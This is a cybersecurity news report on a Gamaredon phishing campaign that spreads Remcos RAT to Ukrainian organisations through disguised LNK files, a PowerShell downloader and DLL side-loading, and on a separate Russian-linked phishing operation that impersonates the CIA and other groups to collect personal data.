Organizations in Ukraine have been targeted in a recent phishing campaign, with the goal of distributing a remote access trojan known as Remcos RAT.
According to Cisco Talos researcher Guilherme Venere, the file names used in the campaign utilize Russian words related to troop movements in Ukraine as a lure. The PowerShell downloader contacts servers located in Russia and Germany to download a ZIP file containing the Remcos backdoor.
The campaign has been attributed to a Russian hacking group known as Gamaredon, which has been tracked under various monikers, including Aqua Blizzard, Armageddon, and Trident Ursa.
Gamaredon, believed to be affiliated with Russia’s Federal Security Service (FSB), has been operating since at least 2013 and is known for targeting Ukrainian organizations for espionage and data theft.
The latest campaign involves distributing Windows shortcut files compressed inside ZIP archives, disguised as Microsoft Office documents related to the ongoing Russo-Ukrainian war. These archives are believed to be sent via phishing emails.
The connection to Gamaredon is based on the use of two machines that were previously utilized by the threat actor for similar purposes.
The LNK files contain PowerShell code that downloads and executes the next-stage payload, as well as a decoy file to maintain the illusion.
The second stage involves another ZIP archive containing a malicious DLL, which is executed via DLL side-loading. The DLL decrypts and runs the final Remcos payload from encrypted files within the archive.
This disclosure comes as Silent Push revealed a phishing campaign using website lures to gather information from Russian individuals sympathetic to Ukraine. The activity is believed to be the work of either Russian Intelligence Services or a threat actor aligned with Russia.
The campaign consists of four major phishing clusters, impersonating the U.S. Central Intelligence Agency (CIA), the Russian Volunteer Corps, and other organizations.
The phishing pages are hosted on a bulletproof hosting provider, Nybula LLC, with the threat actors relying on Google Forms and email responses to gather personal information from victims.
Silent Push noted that all the observed campaigns have similar traits and a common objective: collecting personal information from site-visiting victims.
